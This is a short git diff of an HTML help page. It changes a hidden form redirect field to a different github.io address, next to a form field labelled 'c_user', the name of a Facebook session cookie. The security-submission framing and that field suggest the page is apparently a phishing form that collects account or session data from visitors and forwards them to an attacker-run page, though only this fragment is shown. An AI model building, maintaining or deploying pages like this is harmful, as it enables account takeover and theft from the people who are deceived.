--- a/help.html
+++ b/help.html
@@ -67,7 +67,7 @@
  <input
     type="hidden"
     name="_redirect"
-    value="https://security-submit.netlify.app/"
+    value="https://varfibad.github.io/Submit--request/"
   />
           
               <label class="" style="font-size: 12px">c_user</label><br />
